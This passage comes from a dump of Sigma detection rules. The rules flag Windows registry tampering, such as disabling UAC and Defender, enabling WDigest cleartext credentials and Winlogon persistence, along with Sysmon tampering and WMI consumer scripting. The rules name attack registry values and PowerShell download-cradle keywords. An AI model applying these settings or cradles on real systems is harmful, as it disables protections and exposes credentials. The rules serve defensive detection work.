    "content": "title: UAC Bypass Abusing Winsat Path Parsing - Registry\nid: 6597be7b-ac61-4ac8-bef4-d3ec88174853\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Root\\InventoryApplicationFile\\winsat.exe|'\n        TargetObject|endswith: '\\LowerCaseLongPath'\n        Details|startswith: 'c:\\users\\'\n        Details|endswith: '\\appdata\\local\\temp\\system32\\winsat.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml",
    "content": "title: UAC Bypass Using Windows Media Player - Registry\nid: 5f9db380-ea57-4d1e-beab-8a2d33397e93\nstatus: test\ndescription: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe'\n        Details: 'Binary Data'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_disable.yml",
    "content": "title: UAC Disabled\nid: 48437c39-9e5f-47fb-af95-3d663c3f2919\nrelated:\n    - id: c5f6a85d-b647-40f7-bbad-c10b66bab038\n      type: similar\n    - id: 0d7ceeef-3539-4392-8953-3dc664912714\n      type: similar\nstatus: stable\ndescription: |\n    Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value \"EnableLUA\" to 0.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md\nauthor: frack113\ndate: 2022-01-05\nmodified: 2024-05-10\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_disable_notification.yml",
    "content": "title: UAC Notification Disabled\nid: c5f6a85d-b647-40f7-bbad-c10b66bab038\nrelated:\n    - id: 0d7ceeef-3539-4392-8953-3dc664912714\n      type: similar\n    - id: 48437c39-9e5f-47fb-af95-3d663c3f2919\n      type: similar\nstatus: test\ndescription: |\n    Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the \"UACDisableNotify\" value.\n    UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.\n    When \"UACDisableNotify\" is set to 1, UAC prompts are suppressed.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md\n    - https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-05-10\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Security Center\\UACDisableNotify'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_disable_secure_desktop_prompt.yml",
    "content": "title: UAC Secure Desktop Prompt Disabled\nid: 0d7ceeef-3539-4392-8953-3dc664912714\nrelated:\n    - id: c5f6a85d-b647-40f7-bbad-c10b66bab038\n      type: similar\n    - id: 48437c39-9e5f-47fb-af95-3d663c3f2919\n      type: similar\nstatus: test\ndescription: |\n    Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the \"PromptOnSecureDesktop\" value.\n    The \"PromptOnSecureDesktop\" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.\n    When \"PromptOnSecureDesktop\" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md\nauthor: frack113\ndate: 2024-05-10\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml",
    "content": "title: VBScript Payload Stored in Registry\nid: 46490193-1b22-4c29-bdd6-5bf63907216f\nstatus: test\ndescription: Detects VBScript content stored in registry keys, as seen used by the UNC2452 group\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Software\\Microsoft\\Windows\\CurrentVersion'\n        Details|contains:\n            - 'vbscript:'\n            - 'jscript:'\n            - 'mshtml,'\n            - 'RunHTMLApplication'\n            - 'Execute('\n            - 'CreateObject'\n            - 'window.close'\n    filter:\n        TargetObject|contains: 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n    filter_dotnet:\n        Image|endswith: '\\msiexec.exe'\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\'\n        Details|contains:\n            - '\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll'\n            - '<\\Microsoft.mshtml,fileVersion='\n            - '_mshtml_dll_'\n            - '<\\Microsoft.mshtml,culture='\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable.yml",
    "content": "title: Windows Vulnerable Driver Blocklist Disabled\nid: d526c60a-e236-4011-b165-831ffa52ab70\nrelated:\n    - id: 22154f0e-5132-4a54-aa78-cc62f6def531\n      type: similar\nstatus: experimental\ndescription: |\n    Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers,\n    and its modification may indicate an attempt to bypass security controls. It is often targeted by threat actors to facilitate the installation of malicious or vulnerable drivers,\n    particularly in scenarios involving Endpoint Detection and Response (EDR) bypass techniques.\n    This rule applies to systems that support the Vulnerable Driver Blocklist feature, including Windows 10 version 1903 and later, and Windows Server 2022 and later.\n    Note that this change will require a reboot to take effect, and this rule only detects the registry modification action.\nreferences:\n    - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules\n    - https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control\\CI\\Config\\VulnerableDriverBlocklistEnable'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely and should be investigated immediately.\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml",
    "content": "title: Execution DLL of Choice Using WAB.EXE\nid: fc014922-5def-4da9-a0fc-28c973f41bfb\nstatus: test\ndescription: Detects when the DLL path written in the WAB registry key differs from the default one. When launched, WAB.exe loads the DLL referenced by this registry value.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml\n    - https://twitter.com/Hexacorn/status/991447379864932352\n    - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-13\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\Microsoft\\WAB\\DLLPath'\n    filter:\n        Details: '%CommonProgramFiles%\\System\\wab32.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml",
    "content": "title: Wdigest Enable UseLogonCredential\nid: d6a9b252-c666-4de6-8806-5561bbbd3bdc\nstatus: test\ndescription: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html\n    - https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649\n    - https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019-09-12\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'WDigest\\UseLogonCredential'\n        Details: DWORD (0x00000001)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml",
    "content": "title: Disable Windows Defender Functionalities Via Registry Keys\nid: 0eb46774-f1ab-4a74-8238-1155855f2263\nrelated:\n    - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4\n      type: obsolete\n    - id: fd115e64-97c7-491f-951c-fc8da7e042fa\n      type: obsolete\nstatus: test\ndescription: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry\nreferences:\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105\n    - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\n    - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html\n    - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html\n    - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html\n    - https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/\nauthor: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel\ndate: 2022-08-01\nmodified: 2024-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_main:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows Defender\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\'\n            - '\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\'\n    selection_dword_1:\n        TargetObject|endswith:\n            - '\\DisableAntiSpyware'\n            - '\\DisableAntiVirus'\n            - '\\DisableBehaviorMonitoring'\n            - '\\DisableBlockAtFirstSeen'\n            - '\\DisableEnhancedNotifications'\n            - '\\DisableIntrusionPreventionSystem'\n            - '\\DisableIOAVProtection'\n            - '\\DisableOnAccessProtection'\n            - '\\DisableRealtimeMonitoring'\n            - '\\DisableScanOnRealtimeEnable'\n            - '\\DisableScriptScanning'\n        Details: 'DWORD (0x00000001)'\n    selection_dword_0:\n        TargetObject|endswith:\n            - '\\DisallowExploitProtectionOverride'\n            - '\\Features\\TamperProtection'\n            - '\\MpEngine\\MpEnablePus'\n            - '\\PUAProtection'\n            - '\\Signature Update\\ForceUpdateFromMU'\n            - '\\SpyNet\\SpynetReporting'\n            - '\\SpyNet\\SubmitSamplesConsent'\n            - '\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess'\n        Details: 'DWORD (0x00000000)'\n    filter_optional_symantec:\n        Image|startswith: 'C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\'\n        Image|endswith: '\\sepWscSvc64.exe'\n    condition: selection_main and 1 of selection_dword_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrator actions via the Windows Defender interface\n    - Third party Antivirus\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_winget_admin_settings_tampering.yml",
    "content": "title: Winget Admin Settings Modification\nid: 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236\nstatus: test\ndescription: Detects changes to the AppInstaller (winget) admin settings, such as enabling local manifest installations or disabling installer hash checks\nreferences:\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\n    - https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        Image|endswith: '\\winget.exe'\n        TargetObject|startswith: '\\REGISTRY\\A\\'\n        TargetObject|endswith: '\\LocalState\\admin_settings'\n    condition: selection\nfalsepositives:\n    - The event doesn't contain information about the type of change. False positives are expected with legitimate changes\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_winget_enable_local_manifest.yml",
    "content": "title: Enable Local Manifest Installation With Winget\nid: fa277e82-9b78-42dd-b05c-05555c7b6015\nstatus: test\ndescription: Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests.\nreferences:\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\AppInstaller\\EnableLocalManifestFiles'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Administrators or developers might enable this for testing purposes or to install custom private packages\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml",
    "content": "title: Winlogon AllowMultipleTSSessions Enable\nid: f7997770-92c3-4ec9-b112-774c4ef96f96\nstatus: test\ndescription: |\n  Detects when the 'AllowMultipleTSSessions' value is enabled,\n  which allows multiple Remote Desktop connection sessions to be opened at once.\n  This is often used by attackers as a way to connect to an RDP session without disconnecting the other users.\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions'\n        Details|endswith: DWORD (0x00000001)\n    condition: selection\nfalsepositives:\n    - Legitimate use of the multi session functionality\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml",
    "content": "title: Winlogon Notify Key Logon Persistence\nid: bbf59793-6efb-4fa1-95ca-a7d288e52c88\nstatus: test\ndescription: |\n    Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\n    Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell\nauthor: frack113\ndate: 2021-12-30\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.004\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon'\n        Details|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_config_modification.yml",
    "content": "title: Sysmon Configuration Change\nid: 8ac03a65-6c84-4116-acad-dc1558ff7a77\nstatus: test\ndescription: Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or of someone trying to manipulate the configuration\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\nauthor: frack113\ndate: 2022-01-12\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID: 16\n    # To avoid false positives, add a filter on the hash of your known-good configuration:\n    # filter:\n    #      ConfigurationFileHash: 'SHA256=The_Hash_Of_Your_Valid_Config_XML'\n    # condition: selection and not filter\n    condition: selection\nfalsepositives:\n    - Legitimate administrative action\nlevel: medium\nregression_tests_path: regression_data/rules/windows/sysmon/sysmon_config_modification/info.yml\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_config_modification_error.yml",
    "content": "title: Sysmon Configuration Error\nid: 815cd91b-7dbc-4247-841a-d7dd1392b0a8\nstatus: test\ndescription: Detects when an adversary is trying to hide its actions from Sysmon logging, based on error messages\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html\nauthor: frack113\ndate: 2021-06-04\nmodified: 2022-07-07\ntags:\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: windows\n    category: sysmon_error\ndetection:\n    selection_error:\n        Description|contains:\n            - 'Failed to open service configuration with error'\n            - 'Failed to connect to the driver to update configuration'\n    filter_generic_english:\n        Description|contains|all:\n            - 'Failed to open service configuration with error'\n            - 'Last error: The media is write protected.'\n    filter_by_errorcode:\n        Description|contains:\n            - 'Failed to open service configuration with error 19'\n            - 'Failed to open service configuration with error 93'\n    condition: selection_error and not 1 of filter*\nfalsepositives:\n    - Legitimate administrative action\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_config_modification_status.yml",
    "content": "title: Sysmon Configuration Modification\nid: 1f2b5353-573f-4880-8e33-7d04dcf97744\nstatus: test\ndescription: Detects when an attacker tries to hide from Sysmon by disabling or stopping it\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html\nauthor: frack113\ndate: 2021-06-04\nmodified: 2022-08-02\ntags:\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: windows\n    category: sysmon_status\ndetection:\n    selection_stop:\n        State: Stopped\n    selection_conf:\n        - 'Sysmon config state changed'\n    filter:\n        State: Started\n    condition: 1 of selection_* and not filter\nfalsepositives:\n    - Legitimate administrative action\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_file_block_executable.yml",
    "content": "title: Sysmon Blocked Executable\nid: 23b71bc5-953e-4971-be4c-c896cda73fc2\nstatus: test\ndescription: Triggers on any Sysmon \"FileBlockExecutable\" event, which indicates a violation of the configured block policy\nreferences:\n    - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-16\nmodified: 2023-09-16\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID: 27  # this is fine, we want to match any FileBlockExecutable event\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_file_block_shredding.yml",
    "content": "title: Sysmon Blocked File Shredding\nid: c3e5c1b1-45e9-4632-b242-27939c170239\nstatus: test\ndescription: Triggers on any Sysmon \"FileBlockShredding\" event, which indicates a violation of the configured shredding policy.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\nauthor: frack113\ndate: 2023-07-20\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID: 28  # this is fine, we want to match any FileBlockShredding event\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/sysmon/sysmon_file_executable_detected.yml",
    "content": "title: Sysmon File Executable Creation Detected\nid: 693a44e9-7f26-4cb6-b787-214867672d3a\nstatus: test\ndescription: Triggers on any Sysmon \"FileExecutableDetected\" event, which triggers every time a PE that is monitored by the config is created.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\n    - https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36\nauthor: frack113\ndate: 2023-07-20\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection:\n        EventID: 29  # this is fine, we want to match any FileExecutableDetected event\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/wmi_event/sysmon_wmi_event_subscription.yml",
    "content": "title: WMI Event Subscription\nid: 0f06a3a5-6a09-413f-8743-e6cf35561297\nstatus: test\ndescription: Detects creation of WMI event subscription persistence method\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected\nauthor: Tom Ueltschi (@c_APT_ure)\ndate: 2019-01-12\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    product: windows\n    category: wmi_event\ndetection:\n    selection:\n        EventID:\n            - 19\n            - 20\n            - 21\n    condition: selection\nfalsepositives:\n    - Exclude legitimate (vetted) use of WMI event subscription in your network\nlevel: medium\n"
  },
  {
    "path": "rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml",
    "content": "title: Suspicious Encoded Scripts in a WMI Consumer\nid: 83844185-1c5b-45bc-bcf3-b5bf3084ca5b\nstatus: test\ndescription: Detects suspicious encoded payloads in WMI Event Consumers\nreferences:\n    - https://github.com/RiccardoAncarani/LiquidSnake\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-09-01\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.t1047\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    product: windows\n    category: wmi_event\ndetection:\n    selection_destination:\n        Destination|base64offset|contains:\n            - 'WriteProcessMemory'\n            - 'This program cannot be run in DOS mode'\n            - 'This program must be run under Win32'\n    condition: selection_destination\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml",
    "content": "title: Suspicious Scripting in a WMI Consumer\nid: fe21810c-2a8c-478f-8dd3-5a287fb2a0e0\nstatus: test\ndescription: Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers\nreferences:\n    - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/\n    - https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19\n    - https://github.com/RiccardoAncarani/LiquidSnake\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro\ndate: 2019-04-15\nmodified: 2023-09-09\ntags:\n    - attack.execution\n    - attack.t1059.005\nlogsource:\n    product: windows\n    category: wmi_event\ndetection:\n    selection_destination:\n        - Destination|contains|all:\n              - 'new-object'\n              - 'net.webclient'\n              - '.downloadstring'\n        - Destination|contains|all:\n              - 'new-object'\n              - 'net.webclient'\n              - '.downloadfile'\n        - Destination|contains:\n              - ' iex('\n              - ' -nop '\n              - ' -noprofile '\n              - ' -decode '\n              - ' -enc '\n              - 'WScript.Shell'\n              - 'System.Security.Cryptography.FromBase64Transform'\n    condition: selection_destination\nfalsepositives:\n    - Legitimate administrative scripts\nlevel: high\n"
  },
  {
    "path": "rules-compliance/README.md",
    "content": "TBD"
  },
  {
    "path": "rules-compliance/other/netflow_cleartext_protocols.yml",
    "content": "title: Cleartext Protocol Usage Via Netflow\nid: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f\nstatus: stable\ndescription: |\n  Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\n  Ensure that encryption is used for all sensitive information in transit.\n  Ensure that an encrypted channel is used for all administrative account access.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019-03-26\nmodified: 2022-11-18\ntags:\n    - attack.credential-access\n    # - CSC4\n    # - CSC4.5\n    # - CSC14\n    # - CSC14.4\n    # - CSC16\n    # - CSC16.5\n    # - NIST CSF 1.1 PR.AT-2\n    # - NIST CSF 1.1 PR.MA-2\n    # - NIST CSF 1.1 PR.PT-3\n    # - NIST CSF 1.1 PR.AC-1\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AC-5\n    # - NIST CSF 1.1 PR.AC-6\n    # - NIST CSF 1.1 PR.AC-7\n    # - NIST CSF 1.1 PR.DS-1\n    # - NIST CSF 1.1 PR.DS-2\n    # - ISO 27002-2013 A.9.2.1\n    # - ISO 27002-2013 A.9.2.2\n    # - ISO 27002-2013 A.9.2.3\n    # - ISO 27002-2013 A.9.2.4\n    # - ISO 27002-2013 A.9.2.5\n    # - ISO 27002-2013 A.9.2.6\n    # - ISO 27002-2013 A.9.3.1\n    # - ISO 27002-2013 A.9.4.1\n    # - ISO 27002-2013 A.9.4.2\n    # - ISO 27002-2013 A.9.4.3\n    # - ISO 27002-2013 A.9.4.4\n    # - ISO 27002-2013 A.8.3.1\n    # - ISO 27002-2013 A.9.1.1\n    # - ISO 27002-2013 A.10.1.1\n    # - PCI DSS 3.2 2.1\n    # - PCI DSS 3.2 8.1\n    # - PCI DSS 3.2 8.2\n    # - PCI DSS 3.2 8.3\n    # - PCI DSS 3.2 8.7\n    # - PCI DSS 3.2 8.8\n    # - PCI DSS 3.2 1.3\n    # - PCI DSS 3.2 1.4\n    # - PCI DSS 3.2 4.3\n    # - PCI DSS 3.2 7.1\n    # - PCI DSS 3.2 7.2\n    # - PCI DSS 3.2 7.3\nlogsource:\n    service: netflow\ndetection:\n    selection:\n        destination.port:\n            - 8080\n            - 21\n            - 80\n            - 23\n            - 50000\n            - 1521\n            - 27017\n            - 1433\n            - 11211\n            - 3306\n            - 15672\n            - 5900\n            - 5901\n            - 5902\n            - 5903\n            - 5904\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-compliance/product/qualys/qualys_default_credentials_usage.yml",
